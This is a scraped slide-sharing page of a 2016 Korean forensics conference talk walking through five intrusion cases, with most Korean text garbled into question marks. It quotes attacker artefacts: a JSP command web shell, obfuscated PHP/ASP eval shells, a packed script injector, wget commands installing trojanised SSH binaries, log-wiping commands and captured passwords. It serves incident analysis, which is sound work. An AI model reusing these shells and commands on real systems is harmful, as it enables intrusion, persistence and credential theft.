ºÝºÝߣ

ºÝºÝߣShare a Scribd company logo

(Ficon2016) #2 ???? ??, ???? ???

?
?
INSIGHT FORENSIC
INSIGHT FORENSIC

F-INSIGHT CONFERENCE 2016

1 of 80
???? ?? ¡®16.4.22 KISA ??1? ??? ???? ?? ??, EnCE/CISA/ISMS/CPPG F-INSIGHT CONFERENCE 2016 ???? ???~
?? ?? ?? Case ?? ? ?? ??(?? ??) ? ???? ??(??? ?) ? ?? ??(?? No, Profiling) ? ?? ??(Collabo) Think... Episode
?? ?? ? ????? ??? ??? ??? ?? ?? ? ?? ?? - ??? ??? ?? : Rapid Image, Magic Cube - ?? ?? ?? : Encase 7, FTK, F-EXPLORER
????1st Case ??? ???? ??? ? ? ??
??? ???? ??? ? ? ?? ?? ?? DNS ?? ?? ???? ?? ??? ?? ?? ?? ????? Keyword1st Case
?? ?????1st Case ????
?? ?????1st Case ????
180.131.1.79(koreaboxoffice.com / ??????) -> rafomedia.com(158.85.62.205) -> adrotate.se(83.140.162.230) -> pops.ero-advertising.com(185.70.212.101) -> spaces.slimspots.com(176.31.224.189) -> aff.camplace.com ?? ?????1st Case ????
?? ?????1st Case ????
?? ?????1st Case ????
?? ?????1st Case ????
180.x.x.79(korOOOice.com) -> rafomedia.com(158.85.62.205) -> adrotate.se(83.140.162.230) -> pops.ero-advertising.com(185.70.212.101) -> spaces.slimspots.com(176.31.224.189) -> aff.camplace.com ?? ?????1st Case ????
??? ???? ??? ? ? ?? ?? ??? ?? ? ???. ??? ????? ???? Episode
2nd Case ???? ?? ??? ??. ??? ??? ??
?? ?? ?? ?? ?? ?? ?? ?? ??? ??? ??? ? ?? 2nd Case Keyword
117.x.x.188(??, VPN) 211. x.x.19(??, VPN) 211. x.x.3(??, VPN) 211. x.x.203(??) 210.x.x.22(??) 116.x.x.1~116.x.x.255(??) ???(213) hoxxy.OOO.com ???(222) www.OOO.com ????(209) file.OOO.com ????(223) hoxxdata.OOO.com 211.x47.x0.51(KR) ???? ??(??? ??) ?? ??? FTP ??(??? ??) ?? ??? DB??(210) 211.x34.x2.202(KR) ???? OO?? ??? 58.x.162.x win ?? 13? linux ?? ??? 2nd Case ??? ? ?? ??? ?
<213? ??> D:OnmamWebSiteSourcehomxx.OOO.com/common/js/prototype.js <222? ???> D:OnmamWebSiteSourceimages.OOO.comCommon_jsYUtil.js myOOO.co.kr/test/f/ck.gif eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)] =k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'w+'};c=1};while(c--){if(k[c]){p=p.replace(ne w RegExp('b'+e(c)+'b','g'),k[c])}}return p}('4.3("<0 2=1://5.b.6.a/9/8.7></0>");',12,12,'script|http|src|write|d ocument|itoy|co|gif|all|images|kr|dbros'.split('|'),0,{})) --> ??? ?? document.write("<script src=http://itoy.dbOOO.co.kr/images/all.gif></script>"); 2015-04-20 17:16:17 W3SVC678852465 58.x.x.213 POST /customer/con.asp(??) - 80 ¨C 117.x.x.188(??, VPN) Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.2;+Trident/4.0;+qdesk+2.4.1264.203;+.NET+CLR+1.1.4322;+.N ET+CLR+2.0.50727;+.NET+CLR+3.0.04506.30;+.NET+CLR+3.0.4506.2152;+.NET+CLR+3.5.30729) 200 0 0 2nd Case ??? ? ?? ??? ?
?? ??? ?? IIS? ????? ???? ?? 2nd Case ??? ? ?? ??? ?
??? ??? ?? ???? ??? ?? ?? ??? 2nd Case ??? ? ?? ??? ?
???? ?? ?? ?? ? 209? ???? 222? ??? FTP ??, ?? ?? ??? 2nd Case ??? ? ?? ??? ?
209? ?? ????, ?? C&C? ?????? ?? ?? 2nd Case ??? ? ?? ??? ?
??? ?? ???? ????? Cain.exe ???? ?? Cain.exe ?? ??? ???? ??? ??? ?? ??? ???? ???? ??? ?? ?? isangwhang.com/data/goodsimages/fxp.exe <?? : 2015-04-28 18:40:58> ischoolplus.com/css/zx.exe <?? : 2015-04-28 23:07:31> isangwhang.com/data/goodsimages/cain.exe <?? : 2015-04-28 23:15:37> 209? ???? ???? ?? ?? - ???? ?? ???? ??? ?? 2nd Case ??? ? ?? ??? ?
????? ?? ??? ??? ????? ?? - 223? ???? 209? ??? ????? ?? 223? ???? : 209? ??? ???? ????? ??, ?? C&C? ???? ?? ¡ù ???? ? : lss.jpg(????? HTran ????) ¡ù C&C : 211.x.x.202:443(??) 2nd Case ??? ? ?? ??? ?
C2? ??? ?? ?? ?? - 211.x47.x0.51(OO?? DB??) 2nd Case ??? ? ?? ??? ?
2nd Case ??? ? ?? ??? ?
2nd Case ??? ? ?? ??? ?
??? ??. ??? ??? ?? ???? ? ??? ?? Episode
3rd Case ?? ?? ??? ????, ??? ?? ??
??? PC ???? ?? ?????? ?? ?? ?? ???? ?? ? ?? ???? 3rd Case Keyword
3rd Case ?? ? ?? ??? ??
3rd Case ?????? ???? DDoS ???? ??? ???? ? ??
3rd Case 2013-07-10 10:23:10,134 INFO [org.jboss.naming.NamingService] Started jndi bootstrap jnpPort=1099, rmiPort=1098, backlog=50, bindAddress=/0.0.0.0, 2013-07-10 10:23:14,293 INFO [org.jboss.mq.il.uil2.UILServerILService] JBossMQ UIL service available at : /0.0.0.0:8093 ......(??) 2015-07-30 15:48:09,072 INFO [org.jboss.naming.NamingService] Started jndi bootstrap jnpPort=1099, rmiPort=1098, backlog=50, bindAddress=/0.0.0.0, 2015-07-30 15:48:12,589 INFO [org.jboss.mq.il.uil2.UILServerILService] JBossMQ UIL service available at : /0.0.0.0:8093 ??? ???? ? ??
3rd Case 2013-09-21 06:50:54,798 INFO [org.jboss.web.tomcat.tc5.TomcatDeployer] deploy, //??? ctxPath=/webconsole, //??? warUrl=file:/usr/local/jboss/server/default/deploy/management/webconsole.war/ //?? ??? ???? ? ??
3rd Case <%@page import="java.io.*"%><HTML><BODY><FORM METHOD="GET" NAME="myform" ACTION=""><INPUT TYPE="text" NAME="cmd"><INPUT TYPE="submit" VALUE="Execute"></FORM><PRE><%if (request.getParameter("cmd") != null) {out.println("Command:" + request.getParameter("cmd")); Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); OutputStream os = p.getOutputStream();InputStream in = p.getInputStream();DataInputStream dis = new DataInputStream(in);String disr = dis.readLine(); while ( disr != null ) { out.println(disr);disr = dis.readLine();}}%></BODY></HTML></pre> ?? ? ?? ??? ??
3rd Case ?? Jboss ??? ??? ???? ?? ?? ?? ? ?? ?? 5?, ???? 58?, ??? 1?, IRC bot 1?, DDoS ?? ???? 1? ?? DDoS ???? ?? ? ???? ?? ?? ?? ? ??? ???? ? ??
3rd Case ??? ??? ???? ? ??
3rd Case /tmp/.1/ ??? ??? [energy mech 2.8] IRC bot http://www.energymech.net/index.html ??? ???? ? ??
3rd Case ??? ???? ? ??
??? ??. ??? ??? ?? ??? ??? ??? ?? ??? Episode
4th Case Profiling ???? ???? ????
?? ?? ?? ?? ?? ?? C2 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 4th Case Keyword
cd /tmp/xxx/temp/; wget http://www.OOO.com/xxx/aa.gif wget http://www.OOO.com/xxx/bb.gif wget http://www.OOO.com/xxx/cc.gif mv aa.gif sshd; mv bb.gif ssh; mv cc.gif scp; chmod 755 sshd ssh scp;ls ¨Cal cd /usr/sbin/; mv sshd sshd.bak; cd /usr/bin/; mv scp scp.bak; mv ssh ssh.bak cd /tmp/xxx/temp/; cp sshd /usr/sbin/sshd; cp ssh /usr/bin/ssh; cp scp /usr/bin/scp /etc/init.d/sshd restart ssh 127.0.0.1 cd /usr/bin/; touch ¨Cr scp.bak scp ssh; rm ¨Cf *.bak; ls ¨Cal scp ssh cd /usr/sbin/; touch ¨Cr sshd.bak sshd; rm ¨Cf sshd.bak; ls ¨Cal sshd 4th Case ?? ?? ?? Profiling SSH ???
[root@ksxxxx backup_virus]# strings /usr/sbin/sshd | more Bad options in %.100s file, line %lu: %.50s KiTrap0DExp!!! --> ???? ???? ????? ?? ???? ???? /usr/share/ssh//slog --> ???? ??? ???? ??? ?? %s:%s --> ??? ?? trying public RSA key file %s auth-rsa.c [root@ksxxxx- ssh]# cat slog | tail www:prin**** www:prince4025 root:rlawl**** root:wwlas**** root:eel!**** root:lliet**** 4th Case ?? ?? ?? Profiling SSH ???
4th Case ?? ?? ?? Profiling SSH ???
usb-spi.ko ??? TCP ?? ??? ? ¡®fuck@root¡¯ ???? ? ?? ??? ???? /var/lib/nfs/statd/dm/libijs.so ?? ??? ?? /lib/modules/2.6.18-404.el5/kernel/sound/usb/usb-spi.ko /var/lib/nfs/statd/dm/libijs.so /var/lib/nfs/statd/dm/libijs2.so libijs.so ??? ???? ??? IP??? ??? ?? ?? 4th Case ?? ?? ?? Profiling ???
/proc ?? ??? ?? ??? ???? ?? ?? cmdline : ??? ???? cwd : ?? ?? ???? maps : ?? ??? ?????? ?? ??? ? mem : ???? ??? status : ???? ?? environ : ????? ??? ???? exe : ????? ???? fd : ????? ???? ?? ?? root : ???? ?? ???? 4th Case ?? ?? ?? Profiling ???
/proc ?? ??? ?? ??? ???? ?? ?? for PID in $(./chkproc -v | grep "PID" | grep "/" | awk -F "(" '{print $1}' | awk '{print $2}'); do echo -n "PID[$PID]"; ls -al /proc/$PID |grep exe |awk '{print "exe -> "$11}'; done 4th Case ?? ?? ?? Profiling ???
/proc ?? ??? ?? ??? ???? ?? ?? for PID in $(find ./ -name exe | grep -v task | awk -F "/" '{print $2}'); do echo -n "PID[$PID]"; ls -al /proc/$PID | grep exe |awk '{print "exe -> "$11}';done 4th Case ?? ?? ?? Profiling ???
/usr/bin/umount ¨Cl root ¨Cp 22 ¨Cz dkagh#@!220.x.x.25 ¡°cd /root/; mv .bash_history .bash_history.bak; ls-al¡± /usr/bin/umount ¨Cl root ¨Cp 22 ¨Cz dkagh#@! 220.x.x.25 ¡°cd /var/log/; mv wtmp wtmp.bak; mv lastlog lastlog.bak; mv secure secure.bak; ls ¨Cal *.bak¡± /usr/bin/umount ¨Cl root ¨Cp 22 ¨Cz dkagh#@! 220.x.x.25 ¡°/etc/init.d/iptables stop¡± /usr/bin/umount ¨Cl root ¨Cp 22 ¨Cz dkagh#@! 220.x.x.28 ¡­ /usr/bin/umount ¨Cl root ¨Cp 22 ¨Cz dkagh#@! 220.x.x.29 ¡­ /usr/bin/umount ¨Cl root ¨Cp 22 ¨Cz dkagh#@! 220.x.x.35 ¡­ /usr/bin/umount ¨Cl root ¨Cp 22 ¨Cz dkagh#@! 220.x.x.36 4th Case ?? ?? ?? Profiling
?? ????? ?? ???? ??? ???? 4th Case ?? ?? ?? Profiling
4th Case ?? ?? ?? Profiling
http://www.boutell.com/rinetd/ 4th Case C2 ?? ?? Profiling
4th Case C2 ?? ?? Profiling
4th Case C2 ?? ?? Profiling
4th Case C2 ?? ?? Profiling
4th Case C2 ?? ?? Profiling
C&C?? ??? DB -1 4th Case C2 ?? ?? Profiling
4th Case ?? ?? ?? Profiling
<%eval request("*0#")%> <?php eval($_POST[ad]);?> <%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"""mFpECU"""&")"&")")%> <?php preg_replace("//e",str_replace('%','v'.'a','e'.'%'.'l($_R'.'E'.'Q'.'U'.'E'.'S'.'T'.'[s'.'m'.'s'.'])'),"");?> <?php eval($_POST[cmd]);?><?ob_start();?><?ob_start();?> <?ob_start();?> 4th Case ?? ?? ?? Profiling
4th Case ?? ?? ?? Profiling
? ?? ???? ?? ?? ?? ? ?? ?? ???? ?? ?? 4th Case ?? ?? ?? Profiling
4th Case ?? ?? ?? Profiling
??? API? ?? 4th Case ?? ?? ?? Profiling ??? ??
4th Case ?? ?? ?? Profiling
4th Case ?? ?? ?? Profiling
??? ??. ??? ??? ?? ???? ??? ??? ?? ??? Episode
5th Case ?? ?? Cooperation ? Collaboration
??? ?? Web ??? ?? ???? DB ?? ??? ?? ??, ?? ??? ??? ??? ?? 5th Case Keyword ?? ??
5th Case Scrum vs Kanban.hwp 61.x.x.251 port : 443 (C&C, ) 122.x.x.214 port : 443 (C&C) 15?? ?????? ???.hwp 203.x.x.163 port : 443,8443 (C&C) 196.x.x.106 port : 443, 8443 (C&C) ??? ?? Collabo
5th Case ??? ?? Collabo
5th Case ??? ?? Collabo
5th Case ¢Ù ??? ???? ?? ???? ???? ?? ¢Ú ????? ?? ¢Û ??? PC? ??????? ?? RAT ?? ¢Ü ?? ???? ?? ?? ????? ?? ??? ?? ??? ??? ???? ActiveX ???? ??? ?? ??¡­ ??... ??¡­ Collabo
5th Case ??? ?? [root@exxx bin]# stat /lib/libcom.so.3.0.1 File: `/lib/libcom.so.3.0.1' Access: (0755/-rwxr-xr-x) Uid: ( 0/ root) Gid: ( 0/ root) ??? preload (/etc/ld.so.preload) - ?? ????? so ?? ??? Collabo
5th Case ??? ??
??? ?? C2 ¡¯15.4.25 27.x55.78.x ?????? ¡¯15.7.7 APT C2 ??? zhongwei wang 26815139@ 27.x55.84.x ¡¯15.1.22 27.x55.67.x ??? & ???? C2 ¡¯14.12.10 27.x55.71.x 5th Case ?? ?? Collabo
76 8 16 0 10 20 30 40 50 60 70 80 1??~3?? 4??~6?? 6??~1? ?? ???? ???? ???? ??? ?? ?? ??? ?? ??? ??? ??(50??) ?? 5th Case Log... Collabo
??? ??. ??? ??? ?? ?? ??? ?? ?? ?? ???? Episode
? ???? ??? ????(???, ????, ????) ? ??? ?? ??? ?? ??? ?? ??(?????? ????) ? ?? ?? ?? ?? ?? ?? ? ??? ? ?????/DB??/???? ? ??? ?? ?? ? ???? ???? ? ?? ?? ? ??? ??? ?? ?. Think... NOPASIM
? ???? ??? ??? ?? ?? ?? ? ?? ?? ? ?? ?? ??? Risk ? ?? ???? ?? ?? / ??? ?? ?? ?? ? ????? ??? ? ???? ?? ???? ?? ?? ? Defensive Security? ?? ?? ?. Think... NOPASIM
(Ficon2016) #2 ???? ??, ???? ???

More Related Content

(Ficon2016) #2 ???? ??, ???? ???

  • 1. ???? ?? ¡®16.4.22 KISA ??1? ??? ???? ?? ??, EnCE/CISA/ISMS/CPPG F-INSIGHT CONFERENCE 2016 ???? ???~
  • 2. ?? ?? ?? Case ?? ? ?? ??(?? ??) ? ???? ??(??? ?) ? ?? ??(?? No, Profiling) ? ?? ??(Collabo) Think... Episode
  • 3. ?? ?? ? ????? ??? ??? ??? ?? ?? ? ?? ?? - ??? ??? ?? : Rapid Image, Magic Cube - ?? ?? ?? : Encase 7, FTK, F-EXPLORER
  • 5. ??? ???? ??? ? ? ?? ?? ?? DNS ?? ?? ???? ?? ??? ?? ?? ?? ????? Keyword1st Case
  • 8. 180.131.1.79(koreaboxoffice.com / ??????) -> rafomedia.com(158.85.62.205) -> adrotate.se(83.140.162.230) -> pops.ero-advertising.com(185.70.212.101) -> spaces.slimspots.com(176.31.224.189) -> aff.camplace.com ?? ?????1st Case ????
  • 12. 180.x.x.79(korOOOice.com) -> rafomedia.com(158.85.62.205) -> adrotate.se(83.140.162.230) -> pops.ero-advertising.com(185.70.212.101) -> spaces.slimspots.com(176.31.224.189) -> aff.camplace.com ?? ?????1st Case ????
  • 13. ??? ???? ??? ? ? ?? ?? ??? ?? ? ???. ??? ????? ???? Episode
  • 14. 2nd Case ???? ?? ??? ??. ??? ??? ??
  • 15. ?? ?? ?? ?? ?? ?? ?? ?? ??? ??? ??? ? ?? 2nd Case Keyword
  • 16. 117.x.x.188(??, VPN) 211. x.x.19(??, VPN) 211. x.x.3(??, VPN) 211. x.x.203(??) 210.x.x.22(??) 116.x.x.1~116.x.x.255(??) ???(213) hoxxy.OOO.com ???(222) www.OOO.com ????(209) file.OOO.com ????(223) hoxxdata.OOO.com 211.x47.x0.51(KR) ???? ??(??? ??) ?? ??? FTP ??(??? ??) ?? ??? DB??(210) 211.x34.x2.202(KR) ???? OO?? ??? 58.x.162.x win ?? 13? linux ?? ??? 2nd Case ??? ? ?? ??? ?
  • 17. <213? ??> D:OnmamWebSiteSourcehomxx.OOO.com/common/js/prototype.js <222? ???> D:OnmamWebSiteSourceimages.OOO.comCommon_jsYUtil.js myOOO.co.kr/test/f/ck.gif eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)] =k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'w+'};c=1};while(c--){if(k[c]){p=p.replace(ne w RegExp('b'+e(c)+'b','g'),k[c])}}return p}('4.3("<0 2=1://5.b.6.a/9/8.7></0>");',12,12,'script|http|src|write|d ocument|itoy|co|gif|all|images|kr|dbros'.split('|'),0,{})) --> ??? ?? document.write("<script src=http://itoy.dbOOO.co.kr/images/all.gif></script>"); 2015-04-20 17:16:17 W3SVC678852465 58.x.x.213 POST /customer/con.asp(??) - 80 ¨C 117.x.x.188(??, VPN) Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.2;+Trident/4.0;+qdesk+2.4.1264.203;+.NET+CLR+1.1.4322;+.N ET+CLR+2.0.50727;+.NET+CLR+3.0.04506.30;+.NET+CLR+3.0.4506.2152;+.NET+CLR+3.5.30729) 200 0 0 2nd Case ??? ? ?? ??? ?
  • 18. ?? ??? ?? IIS? ????? ???? ?? 2nd Case ??? ? ?? ??? ?
  • 19. ??? ??? ?? ???? ??? ?? ?? ??? 2nd Case ??? ? ?? ??? ?
  • 20. ???? ?? ?? ?? ? 209? ???? 222? ??? FTP ??, ?? ?? ??? 2nd Case ??? ? ?? ??? ?
  • 21. 209? ?? ????, ?? C&C? ?????? ?? ?? 2nd Case ??? ? ?? ??? ?
  • 22. ??? ?? ???? ????? Cain.exe ???? ?? Cain.exe ?? ??? ???? ??? ??? ?? ??? ???? ???? ??? ?? ?? isangwhang.com/data/goodsimages/fxp.exe <?? : 2015-04-28 18:40:58> ischoolplus.com/css/zx.exe <?? : 2015-04-28 23:07:31> isangwhang.com/data/goodsimages/cain.exe <?? : 2015-04-28 23:15:37> 209? ???? ???? ?? ?? - ???? ?? ???? ??? ?? 2nd Case ??? ? ?? ??? ?
  • 23. ????? ?? ??? ??? ????? ?? - 223? ???? 209? ??? ????? ?? 223? ???? : 209? ??? ???? ????? ??, ?? C&C? ???? ?? ¡ù ???? ? : lss.jpg(????? HTran ????) ¡ù C&C : 211.x.x.202:443(??) 2nd Case ??? ? ?? ??? ?
  • 24. C2? ??? ?? ?? ?? - 211.x47.x0.51(OO?? DB??) 2nd Case ??? ? ?? ??? ?
  • 25. 2nd Case ??? ? ?? ??? ?
  • 26. 2nd Case ??? ? ?? ??? ?
  • 27. ??? ??. ??? ??? ?? ???? ? ??? ?? Episode
  • 28. 3rd Case ?? ?? ??? ????, ??? ?? ??
  • 29. ??? PC ???? ?? ?????? ?? ?? ?? ???? ?? ? ?? ???? 3rd Case Keyword
  • 30. 3rd Case ?? ? ?? ??? ??
  • 31. 3rd Case ?????? ???? DDoS ???? ??? ???? ? ??
  • 32. 3rd Case 2013-07-10 10:23:10,134 INFO [org.jboss.naming.NamingService] Started jndi bootstrap jnpPort=1099, rmiPort=1098, backlog=50, bindAddress=/0.0.0.0, 2013-07-10 10:23:14,293 INFO [org.jboss.mq.il.uil2.UILServerILService] JBossMQ UIL service available at : /0.0.0.0:8093 ......(??) 2015-07-30 15:48:09,072 INFO [org.jboss.naming.NamingService] Started jndi bootstrap jnpPort=1099, rmiPort=1098, backlog=50, bindAddress=/0.0.0.0, 2015-07-30 15:48:12,589 INFO [org.jboss.mq.il.uil2.UILServerILService] JBossMQ UIL service available at : /0.0.0.0:8093 ??? ???? ? ??
  • 33. 3rd Case 2013-09-21 06:50:54,798 INFO [org.jboss.web.tomcat.tc5.TomcatDeployer] deploy, //??? ctxPath=/webconsole, //??? warUrl=file:/usr/local/jboss/server/default/deploy/management/webconsole.war/ //?? ??? ???? ? ??
  • 34. 3rd Case <%@page import="java.io.*"%><HTML><BODY><FORM METHOD="GET" NAME="myform" ACTION=""><INPUT TYPE="text" NAME="cmd"><INPUT TYPE="submit" VALUE="Execute"></FORM><PRE><%if (request.getParameter("cmd") != null) {out.println("Command:" + request.getParameter("cmd")); Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); OutputStream os = p.getOutputStream();InputStream in = p.getInputStream();DataInputStream dis = new DataInputStream(in);String disr = dis.readLine(); while ( disr != null ) { out.println(disr);disr = dis.readLine();}}%></BODY></HTML></pre> ?? ? ?? ??? ??
  • 35. 3rd Case ?? Jboss ??? ??? ???? ?? ?? ?? ? ?? ?? 5?, ???? 58?, ??? 1?, IRC bot 1?, DDoS ?? ???? 1? ?? DDoS ???? ?? ? ???? ?? ?? ?? ? ??? ???? ? ??
  • 37. 3rd Case /tmp/.1/ ??? ??? [energy mech 2.8] IRC bot http://www.energymech.net/index.html ??? ???? ? ??
  • 38. 3rd Case ??? ???? ? ??
  • 39. ??? ??. ??? ??? ?? ??? ??? ??? ?? ??? Episode
  • 41. ?? ?? ?? ?? ?? ?? C2 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 4th Case Keyword
  • 42. cd /tmp/xxx/temp/; wget http://www.OOO.com/xxx/aa.gif wget http://www.OOO.com/xxx/bb.gif wget http://www.OOO.com/xxx/cc.gif mv aa.gif sshd; mv bb.gif ssh; mv cc.gif scp; chmod 755 sshd ssh scp;ls ¨Cal cd /usr/sbin/; mv sshd sshd.bak; cd /usr/bin/; mv scp scp.bak; mv ssh ssh.bak cd /tmp/xxx/temp/; cp sshd /usr/sbin/sshd; cp ssh /usr/bin/ssh; cp scp /usr/bin/scp /etc/init.d/sshd restart ssh 127.0.0.1 cd /usr/bin/; touch ¨Cr scp.bak scp ssh; rm ¨Cf *.bak; ls ¨Cal scp ssh cd /usr/sbin/; touch ¨Cr sshd.bak sshd; rm ¨Cf sshd.bak; ls ¨Cal sshd 4th Case ?? ?? ?? Profiling SSH ???
  • 43. [root@ksxxxx backup_virus]# strings /usr/sbin/sshd | more Bad options in %.100s file, line %lu: %.50s KiTrap0DExp!!! --> ???? ???? ????? ?? ???? ???? /usr/share/ssh//slog --> ???? ??? ???? ??? ?? %s:%s --> ??? ?? trying public RSA key file %s auth-rsa.c [root@ksxxxx- ssh]# cat slog | tail www:prin**** www:prince4025 root:rlawl**** root:wwlas**** root:eel!**** root:lliet**** 4th Case ?? ?? ?? Profiling SSH ???
  • 44. 4th Case ?? ?? ?? Profiling SSH ???
  • 45. usb-spi.ko ??? TCP ?? ??? ? ¡®fuck@root¡¯ ???? ? ?? ??? ???? /var/lib/nfs/statd/dm/libijs.so ?? ??? ?? /lib/modules/2.6.18-404.el5/kernel/sound/usb/usb-spi.ko /var/lib/nfs/statd/dm/libijs.so /var/lib/nfs/statd/dm/libijs2.so libijs.so ??? ???? ??? IP??? ??? ?? ?? 4th Case ?? ?? ?? Profiling ???
  • 46. /proc ?? ??? ?? ??? ???? ?? ?? cmdline : ??? ???? cwd : ?? ?? ???? maps : ?? ??? ?????? ?? ??? ? mem : ???? ??? status : ???? ?? environ : ????? ??? ???? exe : ????? ???? fd : ????? ???? ?? ?? root : ???? ?? ???? 4th Case ?? ?? ?? Profiling ???
  • 47. /proc ?? ??? ?? ??? ???? ?? ?? for PID in $(./chkproc -v | grep "PID" | grep "/" | awk -F "(" '{print $1}' | awk '{print $2}'); do echo -n "PID[$PID]"; ls -al /proc/$PID |grep exe |awk '{print "exe -> "$11}'; done 4th Case ?? ?? ?? Profiling ???
  • 48. /proc ?? ??? ?? ??? ???? ?? ?? for PID in $(find ./ -name exe | grep -v task | awk -F "/" '{print $2}'); do echo -n "PID[$PID]"; ls -al /proc/$PID | grep exe |awk '{print "exe -> "$11}';done 4th Case ?? ?? ?? Profiling ???
  • 49. /usr/bin/umount ¨Cl root ¨Cp 22 ¨Cz dkagh#@!220.x.x.25 ¡°cd /root/; mv .bash_history .bash_history.bak; ls-al¡± /usr/bin/umount ¨Cl root ¨Cp 22 ¨Cz dkagh#@! 220.x.x.25 ¡°cd /var/log/; mv wtmp wtmp.bak; mv lastlog lastlog.bak; mv secure secure.bak; ls ¨Cal *.bak¡± /usr/bin/umount ¨Cl root ¨Cp 22 ¨Cz dkagh#@! 220.x.x.25 ¡°/etc/init.d/iptables stop¡± /usr/bin/umount ¨Cl root ¨Cp 22 ¨Cz dkagh#@! 220.x.x.28 ¡­ /usr/bin/umount ¨Cl root ¨Cp 22 ¨Cz dkagh#@! 220.x.x.29 ¡­ /usr/bin/umount ¨Cl root ¨Cp 22 ¨Cz dkagh#@! 220.x.x.35 ¡­ /usr/bin/umount ¨Cl root ¨Cp 22 ¨Cz dkagh#@! 220.x.x.36 4th Case ?? ?? ?? Profiling
  • 50. ?? ????? ?? ???? ??? ???? 4th Case ?? ?? ?? Profiling
  • 51. 4th Case ?? ?? ?? Profiling
  • 53. 4th Case C2 ?? ?? Profiling
  • 54. 4th Case C2 ?? ?? Profiling
  • 55. 4th Case C2 ?? ?? Profiling
  • 56. 4th Case C2 ?? ?? Profiling
  • 57. C&C?? ??? DB -1 4th Case C2 ?? ?? Profiling
  • 58. 4th Case ?? ?? ?? Profiling
  • 59. <%eval request("*0#")%> <?php eval($_POST[ad]);?> <%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"""mFpECU"""&")"&")")%> <?php preg_replace("//e",str_replace('%','v'.'a','e'.'%'.'l($_R'.'E'.'Q'.'U'.'E'.'S'.'T'.'[s'.'m'.'s'.'])'),"");?> <?php eval($_POST[cmd]);?><?ob_start();?><?ob_start();?> <?ob_start();?> 4th Case ?? ?? ?? Profiling
  • 60. 4th Case ?? ?? ?? Profiling
  • 61. ? ?? ???? ?? ?? ?? ? ?? ?? ???? ?? ?? 4th Case ?? ?? ?? Profiling
  • 62. 4th Case ?? ?? ?? Profiling
  • 63. ??? API? ?? 4th Case ?? ?? ?? Profiling ??? ??
  • 64. 4th Case ?? ?? ?? Profiling
  • 65. 4th Case ?? ?? ?? Profiling
  • 66. ??? ??. ??? ??? ?? ???? ??? ??? ?? ??? Episode
  • 67. 5th Case ?? ?? Cooperation ? Collaboration
  • 68. ??? ?? Web ??? ?? ???? DB ?? ??? ?? ??, ?? ??? ??? ??? ?? 5th Case Keyword ?? ??
  • 69. 5th Case Scrum vs Kanban.hwp 61.x.x.251 port : 443 (C&C, ) 122.x.x.214 port : 443 (C&C) 15?? ?????? ???.hwp 203.x.x.163 port : 443,8443 (C&C) 196.x.x.106 port : 443, 8443 (C&C) ??? ?? Collabo
  • 70. 5th Case ??? ?? Collabo
  • 71. 5th Case ??? ?? Collabo
  • 72. 5th Case ¢Ù ??? ???? ?? ???? ???? ?? ¢Ú ????? ?? ¢Û ??? PC? ??????? ?? RAT ?? ¢Ü ?? ???? ?? ?? ????? ?? ??? ?? ??? ??? ???? ActiveX ???? ??? ?? ??¡­ ??... ??¡­ Collabo
  • 73. 5th Case ??? ?? [root@exxx bin]# stat /lib/libcom.so.3.0.1 File: `/lib/libcom.so.3.0.1' Access: (0755/-rwxr-xr-x) Uid: ( 0/ root) Gid: ( 0/ root) ??? preload (/etc/ld.so.preload) - ?? ????? so ?? ??? Collabo
  • 75. ??? ?? C2 ¡¯15.4.25 27.x55.78.x ?????? ¡¯15.7.7 APT C2 ??? zhongwei wang 26815139@ 27.x55.84.x ¡¯15.1.22 27.x55.67.x ??? & ???? C2 ¡¯14.12.10 27.x55.71.x 5th Case ?? ?? Collabo
  • 76. 76 8 16 0 10 20 30 40 50 60 70 80 1??~3?? 4??~6?? 6??~1? ?? ???? ???? ???? ??? ?? ?? ??? ?? ??? ??? ??(50??) ?? 5th Case Log... Collabo
  • 77. ??? ??. ??? ??? ?? ?? ??? ?? ?? ?? ???? Episode
  • 78. ? ???? ??? ????(???, ????, ????) ? ??? ?? ??? ?? ??? ?? ??(?????? ????) ? ?? ?? ?? ?? ?? ?? ? ??? ? ?????/DB??/???? ? ??? ?? ?? ? ???? ???? ? ?? ?? ? ??? ??? ?? ?. Think... NOPASIM
  • 79. ? ???? ??? ??? ?? ?? ?? ? ?? ?? ? ?? ?? ??? Risk ? ?? ???? ?? ?? / ??? ?? ?? ?? ? ????? ??? ? ???? ?? ???? ?? ?? ? Defensive Security? ?? ?? ?. Think... NOPASIM